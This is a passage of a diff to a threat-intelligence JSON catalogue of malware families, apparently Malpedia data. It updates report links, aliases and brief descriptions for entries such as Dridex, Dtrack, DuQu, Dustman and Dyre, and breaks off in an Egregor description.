"https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", - "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", + "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", + "https://twitter.com/Cryptolaemus1/status/1407135648528711680", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", + "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", "https://malwarebookreports.com/cryptone-cobalt-strike/", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", "https://community.riskiq.com/article/e4fb7245", "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", + "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://home.treasury.gov/news/press-releases/sm845", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://twitter.com/felixw3000/status/1382614469713530883?s=20", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://muha2xmad.github.io/unpacking/dridex/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", - "https://adalogics.com/blog/the-state-of-advanced-code-injections", - "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", - "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", - "https://www.secureworks.com/research/threat-profiles/gold-heron", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://blog.lexfo.fr/dridex-malware.html", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain", - "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", - "https://intel471.com/blog/privateloader-malware", - "https://viql.github.io/dridex/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/", - "https://www.secureworks.com/research/threat-profiles/gold-drake", - "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", - "https://www.atomicmatryoshka.com/post/malware-headliners-dridex", - "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://twitter.com/Cryptolaemus1/status/1407135648528711680", - "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/", - "http://www.secureworks.com/research/threat-profiles/gold-heron", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", + "https://viql.github.io/dridex/", + "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/", - "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", + "https://blog.lexfo.fr/dridex-malware.html", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://intel471.com/blog/privateloader-malware", + "https://unit42.paloaltonetworks.com/travel-themed-phishing/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.atomicmatryoshka.com/post/malware-headliners-dridex", + "https://muha2xmad.github.io/unpacking/dridex/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://cyber-anubis.github.io/malware%20analysis/dridex/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", - "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", - "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", - "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://en.wikipedia.org/wiki/Maksim_Yakubets", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", + "https://www.youtube.com/watch?v=1VB15_HgUkg", + "https://twitter.com/felixw3000/status/1382614469713530883?s=20", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex" + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", + "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "http://www.secureworks.com/research/threat-profiles/gold-heron", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://community.riskiq.com/article/2cd1c003", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/" ], "synonyms": [], "type": [] @@ -22609,11 +23692,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/", "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" ], "synonyms": [ "Spy.Agent.ORM", @@ -22659,8 +23742,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.drokbk", + "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver", "https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/", - "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver" + "https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor" ], "synonyms": [], "type": [] @@ -22673,8 +23757,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook", - "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" ], "synonyms": [], "type": [] @@ -22687,9 +23771,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" ], "synonyms": [], "type": [] @@ -22702,23 +23786,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", - "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage", "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", - "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", + "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", + "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", "https://securelist.com/dtrack-targeting-europe-latin-america/107798/", - "https://securelist.com/my-name-is-dtrack/93338/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ + "Preft", "TroyRAT" ], "type": [] @@ -22744,8 +23831,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN" ], @@ -22773,12 +23860,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail", - "https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/", + "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf", "https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf", - "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/", "https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection", - "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/" + "https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/" ], "synonyms": [], "type": [] @@ -22803,12 +23890,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://docs.broadcom.com/doc/w32-duqu-11-en", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf", + "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" ], "synonyms": [], "type": [] @@ -22817,17 +23904,17 @@ "value": "DuQu" }, { - "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html", "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://twitter.com/Irfan_Asrar/status/1213544175355908096", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/", - "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/" ], "synonyms": [], "type": [] @@ -22840,10 +23927,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.secureworks.com/research/threat-profiles/nickel-academy" ], "synonyms": [ "Escad" @@ -22858,13 +23945,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", - "https://content.fireeye.com/apt/rpt-apt38", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks", + "https://github.com/649/APT38-DYEPACK", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", - "https://github.com/649/APT38-DYEPACK" + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [ + "BanSwift", "swift" ], "type": [] @@ -22890,19 +23981,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", - "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.secureworks.com/research/dyre-banking-trojan", + "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "http://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html" + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" ], "synonyms": [ "Dyreza" @@ -22930,8 +24021,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight", - "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://content.fireeye.com/api/pdfproxy?id=86840" + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" ], "synonyms": [], "type": [] @@ -22944,8 +24035,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", - "https://twitter.com/JaromirHorejsi/status/815861135882780673", - "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/" + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] @@ -22954,76 +24045,76 @@ "value": "EDA2" }, { - "description": "", + "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim\u2019s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim\u2019s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the 